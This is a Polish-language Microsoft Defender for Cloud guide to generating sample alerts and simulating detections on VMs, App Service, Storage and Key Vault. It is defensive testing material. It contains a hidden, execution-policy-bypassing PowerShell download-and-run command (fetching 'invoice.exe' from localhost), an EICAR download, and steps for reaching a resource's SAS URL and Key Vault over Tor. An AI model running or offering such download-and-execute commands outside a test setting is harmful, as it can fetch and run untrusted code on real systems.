Notatka
Dostęp do tej strony wymaga autoryzacji. Może spróbować zalogować się lub zmienić katalogi.
Dostęp do tej strony wymaga autoryzacji. Możesz spróbować zmienić katalogi.
W tym artykule wyjaśniono, jak sprawdzić, czy system jest skonfigurowany pod kątem alertów Microsoft Defender dla Chmury, dzięki czemu można monitorować zagrożenia i reagować na nie.
Czym są alerty zabezpieczeń?
Alerty to powiadomienia, które Defender dla Chmury generują, gdy wykrywa zagrożenia dla zasobów. Defender dla Chmury klasyfikuje alerty według poziomu intensywności i zawiera je na liście z kluczowymi szczegółami. Możesz wykorzystać te informacje, aby szybko zbadać każdy problem. Defender dla Chmury oferuje również kroki, które pomogą Ci naprawić atak.
Aby uzyskać więcej informacji, zobacz Alerty zabezpieczeń w Defender dla Chmury i Zarządzanie alertami zabezpieczeń i reagowanie na nie.
Wymagania wstępne
Aby otrzymywać wszystkie alerty, maszyny i połączone obszary robocze usługi Log Analytics muszą znajdować się w tej samej dzierżawie.
Generowanie przykładowych alertów zabezpieczeń
Jeśli korzystasz z nowego doświadczenia z alertami podglądowymi, możesz tworzyć przykładowe alerty ze strony alertów bezpieczeństwa w portalu Azure. Więcej szczegółów znajdziesz w sekcji Zarządzaj i reaguj na alerty bezpieczeństwa w Microsoft Defender dla Chmury.
Tworzenie przykładowych alertów
Użyj przykładowych alertów, aby:
- Oceń wartość i możliwości planów usługi Microsoft Defender.
- Zweryfikuj wszelkie konfiguracje wprowadzone dla alertów zabezpieczeń, takich jak integracje z informacjami o zabezpieczeniach i zarządzanie zdarzeniami (SIEM), automatyzacja przepływu pracy i powiadomienia e-mail.
Aby utworzyć przykładowe alerty:
- Jako użytkownik z rolą Współautor subskrypcji na pasku narzędzi na stronie alertów zabezpieczeń wybierz pozycję Przykładowe alerty.
- Wybierz subskrypcję.
- Wybierz odpowiednie plany usługi Microsoft Defender, dla których chcesz wyświetlić alerty.
- Wybierz pozycję Utwórz przykładowe alerty.
Zostanie wyświetlone powiadomienie informujące o utworzeniu przykładowych alertów:
Po kilku minutach przykładowe alerty pojawiają się na stronie alertów bezpieczeństwa. Przykładowe alerty pojawiają się także wszędzie indziej, gdzie ustawiłeś tak, aby otrzymywać alerty bezpieczeństwa Microsoft Defender dla Chmury (połączone SIEM, powiadomienia e-mail i tak dalej).
Tip
Alerty dotyczą symulowanych zasobów.
Symulowanie alertów dotyczących maszyn wirtualnych Azure (Windows)
Przed rozpoczęciem upewnij się, że:
- Agent Defender for Endpoint jest zainstalowany na Twoim komputerze przez Defender for Servers.
- Ochrona punktu końcowego w usłudze Microsoft Defender ma włączoną Real-Time ochronę. Aby sprawdzić to ustawienie, zobacz Konfiguruj ochronę w czasie rzeczywistym w Microsoft Defender Antivirus.
Na komputerze, który chcesz przetestować, otwórz podniesiony wiersz poleceń i uruchom skrypt:
Przejdź do pozycji Start i wpisz
cmd.Kliknij prawym przyciskiem myszy pozycję Wiersz polecenia, a następnie wybierz Uruchom jako administrator.
W wierszu polecenia skopiuj i uruchom następujące polecenie:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.Okno wiersza polecenia zostanie zamknięte automatycznie. Jeśli operacja zakończy się powodzeniem, nowy alert powinien pojawić się w bloku Alerty usługi Defender dla Chmury w ciągu 10 minut.
Wiersz komunikatu w oknie programu PowerShell powinien wyglądać podobnie jak pokazano tutaj:
Alternatywnie możesz użyć ciągu testowego EICAR, aby zasymulować alert na Windows. Utwórz plik tekstowy, wklej wiersz EICAR i zapisz plik jako plik wykonywalny na dysku lokalnym komputera.
Symulowanie alertów dotyczących maszyn wirtualnych Azure (Linux)
Przed rozpoczęciem upewnij się, że:
- Agent Ochrona punktu końcowego w usłudze Microsoft Defender jest zainstalowany na Twoim komputerze w ramach integracji z Defender for Servers.
- Ochrona punktu końcowego w usłudze Microsoft Defender działa z włączoną ochroną Real-Time. Aby sprawdzić to ustawienie, zobacz Konfigurowanie ochrony w czasie rzeczywistym w programie antywirusowym Microsoft Defender.
Na maszynie, na której chcesz symulować zaatakowany zasób, postępuj zgodnie z następującymi krokami:
- Otwórz okno terminalu, skopiuj i uruchom następujące polecenie:
curl -O https://secure.eicar.org/eicar.com.txt - Okno Terminala zamyka się automatycznie. Jeśli się powiedzie, nowy alert powinien pojawić się w blade Defender dla Chmury Alerts w ciągu 10 minut.
Symulowanie alertów na platformie Kubernetes
Defender for Containers tworzy alerty dla klastrów i węzłów klastrowych. Monitoruje zarówno płaszczyznę sterowania (serwer API), jak i obciążenie kontenera.
Aby symulować alerty dla płaszczyzny kontroli Defender for Containers oraz obciążenia kontenerowego, użyj narzędzia symulacyjnego alertów Kubernetes.
Aby dowiedzieć się więcej, zobacz Microsoft Defender for Containers.
Symulowanie alertów dla usługi App Service
Alerty dotyczące zasobów uruchomionych w usłudze App Service można symulować.
- Utwórz nową witrynę internetową i poczekaj 24 godziny na zarejestrowanie się w Defender dla Chmury lub użyj istniejącej witryny internetowej.
- Po utworzeniu witryny internetowej uzyskaj do niej dostęp przy użyciu następującego adresu URL:
- Alert jest generowany w ciągu około 2 do 4 godzin.
Symuluj alerty dla Storage Advanced Threat Protection (ATP)
Aby zweryfikować wykrywanie zagrożeń dla Microsoft Defender dla usługi Storage, wykonaj następujące kroki:
Przejdź do konta magazynu, na którym włączono usługę Azure Defender for Storage.
Wybierz kartę Kontenery na pasku bocznym.
Przejdź do istniejącego kontenera lub utwórz nowy.
Przekaż plik do tego kontenera. Unikaj przekazywania dowolnego pliku, który może zawierać poufne dane.
Kliknij prawym przyciskiem myszy przesłany plik i wybierz polecenie Generuj SAS.
Wybierz przycisk Generuj token SAS i adres URL (nie trzeba zmieniać żadnych opcji).
Skopiuj wygenerowany adres URL SAS.
Otwórz stronę pobierania przeglądarki Tor i zainstaluj przeglądarkę Tor.
W przeglądarce Tor Browser przejdź do adresu URL SAS. Powinieneś teraz widzieć i móc pobrać plik, który został przesłany.
Symulacja alertów dla App Service (EICAR)
Aby zasymulować alert EICAR dla usług aplikacji:
- Znajdź punkt końcowy HTTP witryny, otwierając w portalu Azure panel witryny usługi App Service lub korzystając z niestandardowego wpisu DNS skojarzonego z tą witryną. (Domyślny punkt końcowy adresu URL witryny internetowej usługi aplikacja systemu Azure Service ma sufiks
https://XXXXXXX.azurewebsites.net). Witryna internetowa powinna być istniejącą witryną internetową, a nie witryną, która została utworzona przed symulacją alertu. - Znajdź punkt końcowy HTTP witryny internetowej, przechodząc do panelu witryny App Services w Portalu Azure lub korzystając z niestandardowego wpisu DNS skojarzonego z tą witryną internetową. (Domyślny punkt końcowy adresu URL witryny internetowej usługi aplikacja systemu Azure Service ma sufiks
https://XXXXXXX.azurewebsites.net). Witryna internetowa powinna być istniejącą witryną internetową, a nie witryną, która została utworzona przed symulacją alertu. - Przejdź do adresu URL witryny internetowej i dodaj następujący stały sufiks:
/This_Will_Generate_ASC_Alert. Adres URL powinien wyglądać następująco:https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Wygenerowanie alertu może zająć trochę czasu (ok. 1,5 godziny).
Weryfikowanie wykrywania zagrożeń w usłudze Azure Key Vault
Aby zweryfikować wykrywanie zagrożeń Azure Key Vault, stwórz sejf kluczy korzystając z portalu Azure, a następnie wykonaj następujące kroki:
Wymagania wstępne
Kroki weryfikacji
Aby zweryfikować wykrywanie zagrożeń Azure Key Vault:
- Po utworzeniu usługi Key Vault i sekretu przejdź na maszynę wirtualną, która ma dostęp do Internetu, i pobierz przeglądarkę TOR Browser.
- Zainstaluj przeglądarkę TOR na maszynie wirtualnej.
- Po zakończeniu instalacji otwórz zwykłą przeglądarkę, zaloguj się do witryny Azure Portal i uzyskaj dostęp do strony usługi Key Vault. Wybierz wyróżniony adres URL i skopiuj adres.
- Otwórz tor i wklej ten adres URL (musisz ponownie uwierzytelnić się, aby uzyskać dostęp do witryny Azure Portal).
- Po dokonaniu dostępu możesz również wybrać opcję Wpisy tajne w okienku po lewej stronie.
- W przeglądarce TOR wyloguj się z witryny Azure Portal i zamknij przeglądarkę.
- Po pewnym czasie usługa Defender for Key Vault wyzwala alert ze szczegółowymi informacjami na temat tego podejrzanego działania.
Treści powiązane
Dowiedz się więcej o alertach i wykrywaniu zagrożeń w Defender dla Chmury:
- Weryfikowanie wykrywania zagrożeń usługi Azure Key Vault w Microsoft Defender dla Chmury
- Zarządzanie alertami zabezpieczeń i reagowanie na nie w Microsoft Defender dla Chmury — dowiedz się, jak zarządzać alertami i reagować na zdarzenia zabezpieczeń w Defender dla Chmury.
- Omówienie alertów dotyczących zabezpieczeń w usłudze Microsoft Defender dla Chmury